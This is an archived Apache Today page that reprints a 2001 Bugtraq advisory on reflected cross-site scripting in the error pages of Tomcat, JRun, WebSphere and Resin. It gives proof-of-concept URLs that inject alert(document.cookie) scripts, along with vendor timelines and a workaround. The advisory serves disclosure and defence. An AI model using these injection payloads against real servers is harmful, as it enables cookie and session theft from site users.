Your Daily Source for Apache News and Information  
Breaking News Preferences Contribute Triggers Link Us Search About
Apache Today [Your Apache News Source] To internet.com

The 100% Pure 80211 Event

Apache HTTPD Links
The Jakarta Project
Apache Project
Apache XML Project
Apache Module Registry
The Apache Software Foundation
Apache-Perl Integration Project
PHP Server Side Scripting
The Java Apache Project
The Apache FAQ
Apache-Related Projects
ApacheCon

  internet.com

Internet News
Internet Investing
Internet Technology
Windows Internet Tech.
Linux/Open Source
Web Developer
ECommerce/Marketing
ISP Resources
ASP Resources
Wireless Internet
Downloads
Internet Resources
Internet Lists
International
EarthWeb
Career Resources

Search internet.com
Advertising Info
Corporate Info
Bugtraq: Java servlet cross-site scripting vulnerability
Jul 2, 2001, 16 :43 UTC (4 Talkback[s]) (7055 reads)

Multiple Vendor Java Servlet Container Cross-Site Scripting Vulnerability
=========================================================================

Affected products:
=================
  Tomcat 3.2.1, 3.2.2-beta, 4.0-beta
     <http://jakarta.apache.org/tomcat/>
  JRun 3.0
     <http://www.allaire.com/products/jrun/index.cfm>
  WebSphere 3.5 FP2, 3.02, VisualAge for Java 3.5 Professional
     <http://www-4.ibm.com/software/webservers/>
  Resin
     <http://www.caucho.com/products/resin/>


Not affected:
============
  Unknown


Problem:
=======
  Accessing the following URLs, the JavaScript code will be executed
  in the browser on the server's domain.

  Tomcat 3.2.1:
    http://Tomcat/jsp-mapped-dir/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp
  JRun 3.0:
    http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.shtml
    http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp
    http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.thtml
  WebSphere 3.5 FP2:
    http://WebSphere/webapp/examples/<SCRIPT>alert(document.cookie)</SCRIPT>
  WebSphere 3.02:
    http://WebSphere/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp
  VisualAge for Java 3.5 Professional:
    http://VisualAge-WebSphere-Test-Environment/<SCRIPT>alert(document.cookie)</SCRIPT>
  Resin 1.2.2:
    http://Reisin/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp
    http://www.caucho.com/<SCRIPT>document.write(document.cookie)</SCRIPT>.jsp

  These pages produce output like this:
  =================================================
  Error 404
  An error has occurred while processing request:
  http://WebSphere/webapp/examples/******
 
  Message: File not found: file://******
  StackTrace: com.ibm.servlet.engine.webapp.WebAppErrorReport: File not found: file://******
          at javax.servlet.ServletException.<init>(ServletException.java:107)
          at com.ibm.websphere.servlet.error.ServletErrorReport.<init>(ServletErrorReport.java:31)
          at com.ibm.servlet.engine.webapp.WebAppErrorReport.<init>(WebAppErrorReport.java:20)
          at com.ibm.servlet.engine.webapp.WebAppDispatcherResponse.sendError(WebAppDispatcherResponse.java:97)
          ...
  =================================================
  ******: The JavaScript code is executed here.

  This vulnerability is quite similar to "IIS cross-site scripting
  vulnerabilities (MS00-060)" reported by Microsoft on August 25, 2000.
  <http://www.microsoft.com/technet/security/bulletin/ms00-060.asp>


Impact:
======
  For the detail about cross-site scripting, see the following pages.
  <http://www.cert.org/advisories/CA-2000-02.html>
  <http://www.microsoft.com/TechNet/security/crssite.asp>
  <http://www.apache.org/info/css-security/>


Vendor status:
=============

  Tomcat:
  ======
    Notified:
      16 Mar 2001 04:32:02 +0900,
      17 Mar 2001 18:55:45 +0900,
    Response:
      17 Mar 2001 20:07:42 -0000
    Fix:
      30 Mar 2001, Tomcat 4.0-beta-2 (maybe)
      11 May 2001, Tomcat 3.2.2-beta-5 (maybe)
    Announcement:
      <http://jakarta.apache.org/tomcat/news.html>

      Sun Microsystems does not publish Tomcat vulnerabilities.
      <http://java.sun.com/products/jsp/tomcat/>
      <http://java.sun.com/sfaq/chronology.html>

  JRun:
  ====
    Notified:
      13 Mar 2001 23:11:54 +0900,
    Response:
      13 Mar 2001 09:43:49 -0500
      14 Mar 2001 09:05:03 -0500
    Fix:
      28 Jun 2001, Patches for JRun 3.0 and JRun 2.3.3 are available.
    Announcement:
      <http://www.allaire.com/handlers/index.cfm?ID=21498&Method=Full>
      Macromedia Product Security Bulletin (MPSB01-06)
      JRun 3.1, JRun 3.0, JRun 2.3.3: Cross-site scripting vulnerability
      (a.k.a. JavaScript code execution vulnerability)

  WebSphere:
  =========
    Notified:
      20 Mar 2001 08:13:30 +0900, *******@us.ibm.com
    Response:
      22 Mar 2001 09:14:01 -0500
      23 Mar 2001 00:02:58 +0900
    Fix:
      PQ47386V302x (?)
      <http://www-4.ibm.com/software/webservers/appserv/efix.html>
    Announcement:
      <http://www-6.ibm.com/jp/domino01/software/websphere.nsf/TechWeb/EC48D03C7060EAFA49256A1C0009C9F4?openDocument&&ViewName=TechWeb>
      (in Japanese)

  Resin:
  =====
    Notified:
      16 Mar 2001 02:26:47 +0900, ,
    Response:
      None
    Fix:
      Unknown
    Announcement:
      Unknown
      http://www.caucho.com/products/resin/changes.xtp

Workaround:
==========
  Customize error pages.


--
Hiromitsu Takagi, Ph.D.
National Institute of Advanced Industrial Science and Technology,
Tsukuba Central 2, 1-1-1, Umezono, Tsukuba, Ibaraki 305-8568, Japan
http://www.etl.go.jp/~takagi/

  Current Newswire:
SECURITY: Flaws Found in PHP Leave Web Servers Open to Attack

Everything Solaris: Apache: Handling Traffic

LinuxEasyInstaller 2.0 final release

Apache 2.0.32 beta is available

Everything Solaris: Apache: The Basics

Apache Jakarta James Mailserver v2.0a2 Released

PostgreSQL v7.2 Final Release

Daemon News: Multiple webservers behind one IP address

Zend Technologies launches Zend Studio 2.0

NuSphere first to enable development of PHP web services

 Talkback(s) Name  Date
See subject: I just tested this exploit and it doesn&#39;t work. I get "Forbidde ...   It doesn't work with my Tomcat 3.2.1   
  Jul 3, 2001, 03:43:57
http://www.orionserver.com/ alert(document.cookie) .jspgives the following outpu ...   Not-Affected : orion   
  Jul 6, 2001, 06:06:12
hi!i&#39;ve been using tomcat to run my servlets,jsp and beans. i&#39;m pretty c ...   how to use servlets,jsp,beans,ejb with apache not tomcat.   
  Jul 29, 2001, 16:10:11
Is Jserv affected? Or do you have to run JSP?Ben Ricker ...   Jserv Affected?   
  Aug 24, 2001, 16:22:55
Enter your comments below.
Your Name: Your Email Address:


Subject: CC: [will also send this talkback to an E-Mail address]
Comments:

See our talkback-policy for or guidelines on talkback content.

About Triggers Media Kit Security Triggers Login


All times are recorded in UTC.
Linux is a trademark of Linus Torvalds.
Powered by Linux 2.4, Apache 1.3, and PHP 4
Copyright 2002 INT Media Group, Incorporated All Rights Reserved.
Legal Notices,  Licensing, Reprints, & Permissions,  Privacy Policy.
http://www.internet.com/